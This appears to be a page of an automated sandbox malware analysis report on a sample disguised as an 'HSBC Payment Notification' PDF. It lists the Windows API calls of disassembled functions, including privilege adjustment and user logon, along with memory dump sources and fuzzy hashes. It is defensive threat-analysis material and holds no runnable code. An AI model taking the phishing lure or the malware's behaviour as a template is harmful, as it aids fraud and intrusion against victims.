                                                                                                                                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A0A9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3479602957-0
                                                                                                                                                    • Opcode ID: aedf4ef7b819e7061a1d9f91078b4e07f1c96d427ff214e73d92c0d6c6dea44e
                                                                                                                                                    • Instruction ID: 2c9db32d3ae4548df1de74cdb7d607b6943671b75e71bd67b23ca617ca970478
                                                                                                                                                    • Opcode Fuzzy Hash: aedf4ef7b819e7061a1d9f91078b4e07f1c96d427ff214e73d92c0d6c6dea44e
                                                                                                                                                    • Instruction Fuzzy Hash: D8F0823550522DABDB21AFA4CC48FEE776CBF08361F00416AF909E6191DA349954CBA6
                                                                                                                                                    Function 004581CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
                                                                                                                                                    • CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 81990902-0
                                                                                                                                                    • Opcode ID: 9ec38f7879727ea9b1300892ff3550b9fff1aaeeeffd9baaebef182c4f9d335e
                                                                                                                                                    • Instruction ID: 9bafbd08ffd8acbbb2d026fb6ea58a2c51283803ccb0941fee12b6a17b14d6d6
                                                                                                                                                    • Opcode Fuzzy Hash: 9ec38f7879727ea9b1300892ff3550b9fff1aaeeeffd9baaebef182c4f9d335e
                                                                                                                                                    • Instruction Fuzzy Hash: 13E04632000620AEE7212B61FC08D777BEAEB04314720882EB8A680431CF22AC90DB18
                                                                                                                                                    Function 0042A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,00494178,00428D57,00493E50,?,?,00000001), ref: 0042A15A
                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0042A163
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                    • Opcode ID: c2bfc4d91f5eef072ecd4d4a99461c52a82975f392c39b974fa7ca05b3ef40fa
                                                                                                                                                    • Instruction ID: 9da78fce3b57c7d2137df8720d13279edd616241823e717daaa40eb201d223bb
                                                                                                                                                    • Opcode Fuzzy Hash: c2bfc4d91f5eef072ecd4d4a99461c52a82975f392c39b974fa7ca05b3ef40fa
                                                                                                                                                    • Instruction Fuzzy Hash: CCB09231254308ABCA022B91EC09B8C3F68EB46AA2F404434FA0D84C60CB6254548B99
                                                                                                                                                    Function 0042F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
                                                                                                                                                    • Instruction ID: 9dbe1c865c2330f56ffee62ed517aae1867acb93b770053fb6672ec4a27fddfc
                                                                                                                                                    • Opcode Fuzzy Hash: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
                                                                                                                                                    • Instruction Fuzzy Hash: 08322861E29F114DD7239634D832336A258AFB73C8F95D737F819B5AA5EB28D4C34208
                                                                                                                                                    Function 0043242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
                                                                                                                                                    • Instruction ID: 6c6381ca5121d9a8a5ca5470a2620081c1b3ce1be078dbaf297b8ac86cff2730
                                                                                                                                                    • Opcode Fuzzy Hash: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
                                                                                                                                                    • Instruction Fuzzy Hash: E2B10130E2AF414DD72396398935336BA5CAFBB2C5F51D72BFC2670D22EB2185934185
                                                                                                                                                    Function 00464C53 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00464C76
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: mouse_event
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2434400541-0
                                                                                                                                                    • Opcode ID: ee9df15493a40b048f6a63b66618f3ae232bfa5e5e2bfa15106318706817909b
                                                                                                                                                    • Instruction ID: b34e2a9394489d035c963e7dd8f40c9807a13273b0ab6c7f74163ad9f46ae88e
                                                                                                                                                    • Opcode Fuzzy Hash: ee9df15493a40b048f6a63b66618f3ae232bfa5e5e2bfa15106318706817909b
                                                                                                                                                    • Instruction Fuzzy Hash: BED05EA032220838ECA807209D5FF7F1109E3C0B81F96854B7241853C1F8DC6801A03F
                                                                                                                                                    Function 004587B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00458389), ref: 004587D1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LogonUser
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1244722697-0
                                                                                                                                                    • Opcode ID: 18205445d52b48e02bcf404b6a946f346a5f79f7dd958708f793c28153997f24
                                                                                                                                                    • Instruction ID: bbaf709efb0beb88cdfa5f1a33ae6004459e2c5163e494cc38a8a30eb56211a1
                                                                                                                                                    • Opcode Fuzzy Hash: 18205445d52b48e02bcf404b6a946f346a5f79f7dd958708f793c28153997f24
                                                                                                                                                    • Instruction Fuzzy Hash: 49D05E3226050EAFEF018EA4DC01EAE3B69EB04B01F408521FE15D50A1C775E835AB60
                                                                                                                                                    Function 0042A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0042A12A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                    • Opcode ID: de316c34264f802ad97e41e2d96b97a4976e2443a0324b54249a0beeda03384a
                                                                                                                                                    • Instruction ID: 5f0b767449e3d37fa0a9cb76ca1a1966b2bcebad2f74a673b8e7725f9ca30b43
                                                                                                                                                    • Opcode Fuzzy Hash: de316c34264f802ad97e41e2d96b97a4976e2443a0324b54249a0beeda03384a
                                                                                                                                                    • Instruction Fuzzy Hash: E2A0113000020CAB8A022B82EC08888BFACEA022A0B008030F80C808228B32A8208A88
                                                                                                                                                    Function 00418808 Relevance: .6, Instructions: 590COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: bc918cabfbc13eeeaccb278bb908b555cf4655f640fadc8373e86b06f087c2cb
                                                                                                                                                    • Instruction ID: d3e05baf70842595a15b67714876080b4d37379fdc1224c105ba09137936e944
                                                                                                                                                    • Opcode Fuzzy Hash: bc918cabfbc13eeeaccb278bb908b555cf4655f640fadc8373e86b06f087c2cb
                                                                                                                                                    • Instruction Fuzzy Hash: 44223730904506CBDF288A68C4A47BEB7A1BF41345F28816FDD468B693DB7C9CD6C74A
                                                                                                                                                    Function 004221C5 Relevance: .3, Instructions: 345COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                                                    • Instruction ID: 35e5cfd0643d00128ec34ecd890c43f992cb4d917009b55117061340238bc551
                                                                                                                                                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                                                    • Instruction Fuzzy Hash: 18C1D83230507349DF2D4639953403FFAA15EA27B139A076FD8B3CB2D4EE18D965D624
                                                                                                                                                    Function 004225FA Relevance: .3, Instructions: 341COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                                                    • Instruction ID: 4494295b5c4546222a84ad3f443fcd2c01bced2acdb834a923f1c328fe2fc13d
                                                                                                                                                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                                                    • Instruction Fuzzy Hash: CAC1D4333090B34ADF2D4639953403FBAA15EA27B139B036FD4B2DB2D4EE18D925D624
                                                                                                                                                    Function 0048A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 0048A630
                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0048A661
                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 0048A66D
                                                                                                                                                    • SetBkColor.GDI32(?,000000FF), ref: 0048A687
                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0048A696
                                                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0048A6C1
                                                                                                                                                    • GetSysColor.USER32(00000010), ref: 0048A6C9
                                                                                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 0048A6D0
                                                                                                                                                    • FrameRect.USER32(?,?,00000000), ref: 0048A6DF
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0048A6E6
                                                                                                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 0048A731
                                                                                                                                                    • FillRect.USER32(?,?,00000000), ref: 0048A763
                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0048A78E
                                                                                                                                                      • Part of subcall function 0048A8CA: GetSysColor.USER32(00000012), ref: 0048A903
                                                                                                                                                      • Part of subcall function 0048A8CA: SetTextColor.GDI32(?,?), ref: 0048A907
                                                                                                                                                      • Part of subcall function 0048A8CA: GetSysColorBrush.USER32(0000000F), ref: 0048A91D
                                                                                                                                                      • Part of subcall function 0048A8CA: GetSysColor.USER32(0000000F), ref: 0048A928
                                                                                                                                                      • Part of subcall function 0048A8CA: GetSysColor.USER32(00000011), ref: 0048A945
                                                                                                                                                      • Part of subcall function 0048A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
                                                                                                                                                      • Part of subcall function 0048A8CA: SelectObject.GDI32(?,00000000), ref: 0048A964
                                                                                                                                                      • Part of subcall function 0048A8CA: SetBkColor.GDI32(?,00000000), ref: 0048A96D
                                                                                                                                                      • Part of subcall function 0048A8CA: SelectObject.GDI32(?,?), ref: 0048A97A
                                                                                                                                                      • Part of subcall function 0048A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
                                                                                                                                                      • Part of subcall function 0048A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
                                                                                                                                                      • Part of subcall function 0048A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
                                                                                                                                                      • Part of subcall function 0048A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3521893082-0
                                                                                                                                                    • Opcode ID: d0b98d0bd2d439f0e376530d70ac2fa86c41f3a1b8d0dc48bc9816d6a88522a1
                                                                                                                                                    • Instruction ID: fb34620bd59db4fe0d00bba54468f49f6ea6f7247eb536f08ce7ecc3d6e9d283
                                                                                                                                                    • Opcode Fuzzy Hash: d0b98d0bd2d439f0e376530d70ac2fa86c41f3a1b8d0dc48bc9816d6a88522a1
                                                                                                                                                    • Instruction Fuzzy Hash: 5E917D72408301BFD710AF64DC08A5F7BA9FB89321F100F2EF962961A1D774D949CB5A
                                                                                                                                                    Function 00402C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • DestroyWindow.USER32(?,?,?), ref: 00402CA2
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00402CE8
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00402CF3
                                                                                                                                                    • DestroyIcon.USER32(00000000,?,?,?), ref: 00402CFE
                                                                                                                                                    • DestroyWindow.USER32(00000000,?,?,?), ref: 00402D09
                                                                                                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 0043C43B
                                                                                                                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0043C474
                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0043C89D
                                                                                                                                                      • Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A
                                                                                                                                                    • SendMessageW.USER32(?,00001053), ref: 0043C8DA
                                                                                                                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0043C8F1
                                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043C907
                                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043C912
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
